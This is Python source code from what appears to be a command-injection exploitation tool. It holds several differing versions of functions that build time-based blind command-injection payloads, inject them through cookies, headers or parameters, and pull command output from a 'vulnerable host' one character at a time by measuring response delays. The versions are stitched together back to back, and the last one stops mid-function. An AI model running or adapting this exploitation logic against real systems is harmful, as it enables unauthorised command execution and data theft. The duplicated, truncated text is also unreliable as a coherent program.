def false_positive_check(separator, TAG, cmd, whitespace, prefix, suffix, timesec, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long, url_time_response): if settings.TARGET_OS == "win": previous_cmd = cmd if alter_shell: cmd = settings.WIN_PYTHON_DIR + " -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\"" else: cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length" found_chars = False info_msg = "Checking the reliability of the used payload " info_msg += "in case of a false positive result... " if settings.VERBOSITY_LEVEL == 1: sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL > 1: print settings.print_info_msg(info_msg) # Varying the sleep time. timesec = timesec + random.randint(1, 5) # Checking the output length of the used payload. for output_length in range(1, 3): # Execute shell commands on vulnerable host. if alter_shell: payload = tb_payloads.cmd_execution_alter_shell( separator, cmd, output_length, timesec, http_request_method) else: payload = tb_payloads.cmd_execution(separator, cmd, output_length, timesec, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") sys.stdout.write("\n" + settings.print_payload(payload_msg)) # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for testing the reliability of used payload..." print settings.print_info_msg(info_msg) payload_msg = payload.replace("\n", "\\n") sys.stdout.write(settings.print_payload(payload_msg) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: how_long = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response) if (how_long >= settings.FOUND_HOW_LONG) and (how_long - timesec >= settings.FOUND_DIFF): found_chars = True break if found_chars == True: if settings.TARGET_OS == "win": cmd = previous_cmd num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = 0 sys.stdout.flush() is_valid = False for num_of_chars in range(1, int(num_of_chars)): for ascii_char in range(1, 20): if alter_shell: # Get the execution output, of shell execution. payload = tb_payloads.fp_result_alter_shell( separator, cmd, num_of_chars, ascii_char, timesec, http_request_method) else: # Get the execution output, of shell execution. payload = tb_payloads.fp_result(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") sys.stdout.write("\n" + settings.print_payload(payload_msg)) # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for testing the reliability of used payload..." print settings.print_info_msg(info_msg) payload_msg = payload.replace("\n", "\\n") sys.stdout.write( settings.print_payload(payload_msg) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test( url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: how_long = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test( url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response) if (how_long >= settings.FOUND_HOW_LONG) and ( how_long - timesec >= settings.FOUND_DIFF): output.append(ascii_char) is_valid = True break if is_valid: break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) if str(output) == str(randvcalc): return how_long, output
def false_positive_check(separator, TAG, cmd, whitespace, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long, url_time_response): found_chars = False if settings.VERBOSITY_LEVEL >= 1: info_msg = "Testing the reliability of used payload... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() for output_length in range(1, 3): # Execute shell commands on vulnerable host. if alter_shell: payload = tb_payloads.cmd_execution_alter_shell( separator, cmd, output_length, delay, http_request_method) else: payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) if settings.TAMPER_SCRIPTS['base64encode']: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: payload_msg = payload.replace("\n", "\\n") sys.stdout.write("\n" + settings.print_payload(payload_msg)) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response) if (how_long >= settings.FOUND_HOW_LONG) and (how_long - delay >= settings.FOUND_DIFF): found_chars = True break if found_chars == True: num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = 0 sys.stdout.flush() for num_of_chars in range(1, int(num_of_chars)): for ascii_char in range(1, 3): if alter_shell: # Get the execution output, of shell execution. payload = tb_payloads.fp_result_alter_shell( separator, cmd, num_of_chars, ascii_char, delay, http_request_method) else: # Get the execution output, of shell execution. payload = tb_payloads.fp_result(separator, cmd, num_of_chars, ascii_char, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) if settings.TAMPER_SCRIPTS['base64encode']: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: payload_msg = payload.replace("\n", "\\n") sys.stdout.write("\n" + settings.print_payload(payload_msg)) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test( url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test( url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response) if (how_long >= settings.FOUND_HOW_LONG) and ( how_long - delay >= settings.FOUND_DIFF): output.append(ascii_char) break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) if str(output) == str(randvcalc): return how_long, output
def injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response): if settings.TARGET_OS == "win": previous_cmd = cmd if alter_shell: cmd = settings.WIN_PYTHON_DIR + " -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\"" else: cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length" if menu.options.file_write or menu.options.file_upload: minlen = 0 else: minlen = 1 found_chars = False info_msg = "Retrieving the length of execution output... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() if settings.VERBOSITY_LEVEL > 1: print "" for output_length in range(int(minlen), int(maxlen)): if alter_shell: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution_alter_shell( separator, cmd, output_length, timesec, http_request_method) else: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution(separator, cmd, output_length, timesec, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") sys.stdout.write("\n" + settings.print_payload(payload_msg)) # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print settings.print_info_msg(info_msg) payload_msg = payload.replace("\n", "\\n") sys.stdout.write(settings.print_payload(payload_msg) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: how_long = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response) # Examine time-responses injection_check = False if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF): injection_check = True if injection_check == True: if output_length > 1: if settings.VERBOSITY_LEVEL >= 1: pass else: sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") sys.stdout.flush() if settings.VERBOSITY_LEVEL == 1: print "" success_msg = "Retrieved " + str( output_length) + " characters." print settings.print_success_msg(success_msg) found_chars = True injection_check = False break # Proceed with the next (injection) step! if found_chars == True: if settings.TARGET_OS == "win": cmd = previous_cmd num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = "0.0" info_msg = "Presuming the execution output, please wait... " if menu.options.verbose < 1: info_msg += "[ " + str(percent) + "% ]" elif menu.options.verbose == 1: info_msg += "" else: info_msg += "\n" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() for num_of_chars in range(1, int(num_of_chars)): char_pool = checks.generate_char_pool(num_of_chars) for ascii_char in char_pool: if alter_shell: # Get the execution output, of shell execution. payload = tb_payloads.get_char_alter_shell( separator, cmd, num_of_chars, ascii_char, timesec, http_request_method) else: # Get the execution output, of shell execution. payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") sys.stdout.write("\n" + settings.print_payload(payload_msg)) # Check if defined "--verbose" option. elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print settings.print_info_msg(info_msg) payload_msg = payload.replace("\n", "\\n") sys.stdout.write( settings.print_payload(payload_msg) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test( url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: how_long = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test( url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response) # Examine time-responses injection_check = False if (how_long >= settings.FOUND_HOW_LONG and how_long - timesec >= settings.FOUND_DIFF): injection_check = True if injection_check == True: if not settings.VERBOSITY_LEVEL >= 1: output.append(chr(ascii_char)) percent = ((num_of_chars * 100) / output_length) float_percent = str("{0:.1f}".format( round(((num_of_chars * 100) / (output_length * 1.0)), 2))) + "%" if percent == 100: float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL info_msg = "Presuming the execution output, " info_msg += "please wait... [ " + float_percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() else: output.append(chr(ascii_char)) injection_check = False break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) # Check for empty output. if output == (len(output) * " "): output = "" else: check_start = 0 if not settings.VERBOSITY_LEVEL >= 1: sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]") sys.stdout.flush() else: print "" check_how_long = 0 output = False if settings.VERBOSITY_LEVEL >= 1 and menu.options.ignore_session: print "" return check_how_long, output
def false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long): # Log previous 'how_long' for later comparison previous_how_long = how_long found_chars = False if menu.options.verbose: sys.stdout.write("\n(*) Testing the reliability of used payload... ") sys.stdout.flush() for output_length in range(1, 3): if alter_shell: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method) else: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if (previous_how_long == how_long) and (how_long >= delay): found_chars = True break if found_chars == True : num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() output = [] percent = 0 # Log previous 'how_long' for later comparison previous_how_long = how_long sys.stdout.flush() for num_of_chars in range(1, int(num_of_chars)): for ascii_char in range(1, 3): if alter_shell: # Get the execution output, of shell execution. payload = tb_payloads.fp_result_alter_shell(separator, cmd, num_of_chars, ascii_char, delay, http_request_method) else: # Get the execution output, of shell execution. payload = tb_payloads.fp_result(separator, cmd, num_of_chars, ascii_char, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if (previous_how_long == how_long) and (how_long >= delay): output.append(ascii_char) break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) if str(output) == str(randvcalc): return how_long, output
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response): if settings.TARGET_OS == "win": previous_cmd = cmd if alter_shell: cmd = settings.WIN_PYTHON_DIR + "python.exe -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\"" else: cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length" if menu.options.file_write or menu.options.file_upload: minlen = 0 else: minlen = 1 found_chars = False sys.stdout.write(settings.INFO_SIGN + "Retrieving the length of execution output... ") sys.stdout.flush() for output_length in range(int(minlen), int(maxlen)): if alter_shell: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution_alter_shell( separator, cmd, output_length, delay, http_request_method) else: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + settings.PAYLOAD_SIGN + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response) # Examine time-responses injection_check = False # if settings.TARGET_OS == "win" and alter_shell is not None : # if (how_long > settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF): # injection_check = True # else: if (how_long >= settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF): injection_check = True if injection_check == True: if output_length > 1: if menu.options.verbose: print "\n" else: sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") sys.stdout.flush() print Style.BRIGHT + "(!) Retrieved " + str( output_length) + " characters." + Style.RESET_ALL found_chars = True injection_check = False break # Proceed with the next (injection) step! if found_chars == True: num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() if settings.TARGET_OS == "win": cmd = previous_cmd output = [] percent = "0.0" sys.stdout.write("\r" + settings.INFO_SIGN + "Grabbing the output, please wait... [ " + str(percent) + "% ]") sys.stdout.flush() for num_of_chars in range(1, int(num_of_chars)): if num_of_chars == 1: # Checks {A..Z},{a..z},{0..9},{Symbols} char_pool = range(65, 90) + range(96, 122) else: # Checks {a..z},{A..Z},{0..9},{Symbols} char_pool = range(96, 122) + range(65, 90) char_pool = char_pool + range(48, 57) + range(32, 48) + range( 90, 96) + range(57, 65) + range(122, 127) for ascii_char in char_pool: if alter_shell: # Get the execution output, of shell execution. payload = tb_payloads.get_char_alter_shell( separator, cmd, num_of_chars, ascii_char, delay, http_request_method) else: # Get the execution output, of shell execution. payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + settings.PAYLOAD_SIGN + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test( url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test( url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response) # Examine time-responses injection_check = False # if settings.TARGET_OS == "win" and alter_shell is not None : # if (how_long > settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF): # injection_check = True # else: if (how_long >= settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF): injection_check = True if injection_check == True: if not menu.options.verbose: output.append(chr(ascii_char)) percent = ((num_of_chars * 100) / output_length) float_percent = "{0:.1f}".format( round( ((num_of_chars * 100) / (output_length * 1.0)), 2)) sys.stdout.write( "\r" + settings.INFO_SIGN + "Grabbing the output, please wait... [ " + str(float_percent) + "% ]") sys.stdout.flush() else: output.append(chr(ascii_char)) injection_check = False break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) # Check for empty output. if output == (len(output) * " "): output = "" else: check_start = 0 if not menu.options.verbose: sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]\n") sys.stdout.flush() else: print "" check_how_long = 0 output = False return check_how_long, output
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response): if settings.TARGET_OS == "win": previous_cmd = cmd if alter_shell: cmd = settings.WIN_PYTHON_DIR + "python.exe -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\"" else: cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length" if menu.options.file_write or menu.options.file_upload: minlen = 0 else: minlen = 1 found_chars = False sys.stdout.write(settings.INFO_SIGN + "Retrieving the length of execution output... ") sys.stdout.flush() for output_length in range(int(minlen), int(maxlen)): if alter_shell: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method) else: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + settings.PAYLOAD_SIGN + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response) # Examine time-responses injection_check = False # if settings.TARGET_OS == "win" and alter_shell is not None : # if (how_long > settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF): # injection_check = True # else: if (how_long >= settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF): injection_check = True if injection_check == True: if output_length > 1: if menu.options.verbose: print "\n" else: sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL+ "]\n") sys.stdout.flush() print Style.BRIGHT + "(!) Retrieved " + str(output_length) + " characters." + Style.RESET_ALL found_chars = True injection_check = False break # Proceed with the next (injection) step! if found_chars == True : num_of_chars = output_length + 1 check_start = 0 check_end = 0 check_start = time.time() if settings.TARGET_OS == "win": cmd = previous_cmd output = [] percent = "0.0" sys.stdout.write("\r" + settings.INFO_SIGN + "Grabbing the output, please wait... [ " +str(percent)+ "% ]") sys.stdout.flush() for num_of_chars in range(1, int(num_of_chars)): if num_of_chars == 1: # Checks {A..Z},{a..z},{0..9},{Symbols} char_pool = range(65, 90) + range(96, 122) else: # Checks {a..z},{A..Z},{0..9},{Symbols} char_pool = range(96, 122) + range(65, 90) char_pool = char_pool + range(48, 57) + range(32, 48) + range(90, 96) + range(57, 65) + range(122, 127) for ascii_char in char_pool: if alter_shell: # Get the execution output, of shell execution. payload = tb_payloads.get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, delay, http_request_method) else: # Get the execution output, of shell execution. payload = tb_payloads.get_char(separator, cmd, num_of_chars, ascii_char, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + settings.PAYLOAD_SIGN + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: how_long = custom_header_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response) # Examine time-responses injection_check = False # if settings.TARGET_OS == "win" and alter_shell is not None : # if (how_long > settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF): # injection_check = True # else: if (how_long >= settings.FOUND_HOW_LONG and how_long - delay >= settings.FOUND_DIFF): injection_check = True if injection_check == True: if not menu.options.verbose: output.append(chr(ascii_char)) percent = ((num_of_chars*100)/output_length) float_percent = "{0:.1f}".format(round(((num_of_chars * 100)/(output_length * 1.0)),2)) sys.stdout.write("\r" + settings.INFO_SIGN + "Grabbing the output, please wait... [ " +str(float_percent)+ "% ]") sys.stdout.flush() else: output.append(chr(ascii_char)) injection_check = False break check_end = time.time() check_how_long = int(check_end - check_start) output = "".join(str(p) for p in output) # Check for empty output. if output == (len(output) * " "): output = "" else: check_start = 0 if not menu.options.verbose: sys.stdout.write("[" +Fore.RED+ " FAILED " + Style.RESET_ALL+ "]\n") sys.stdout.flush() else: print "" check_how_long = 0 output = False return check_how_long, output
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename): if menu.options.file_write or menu.options.file_upload: minlen = 0 else: minlen = 1 found_chars = False sys.stdout.write("(*) Retrieving the length of execution output... ") sys.stdout.flush() for output_length in range(int(minlen), int(maxlen)): if alter_shell: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, delay, http_request_method) else: # Execute shell commands on vulnerable host. payload = tb_payloads.cmd_execution(separator, cmd, output_length, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: how_long = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: how_long = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: how_long = referer_injection_test(url, vuln_parameter, payload) else: how_long = examine_requests(payload, vuln_parameter, http_request_method, url) if how_long >= delay: if output_length > 1: if menu.options.verbose: print "\n" else: sys.stdout.write("["+Fore.GREEN+" SUCCEED "+ Style.RESET_ALL+"]\n") sys.stdout.flush() 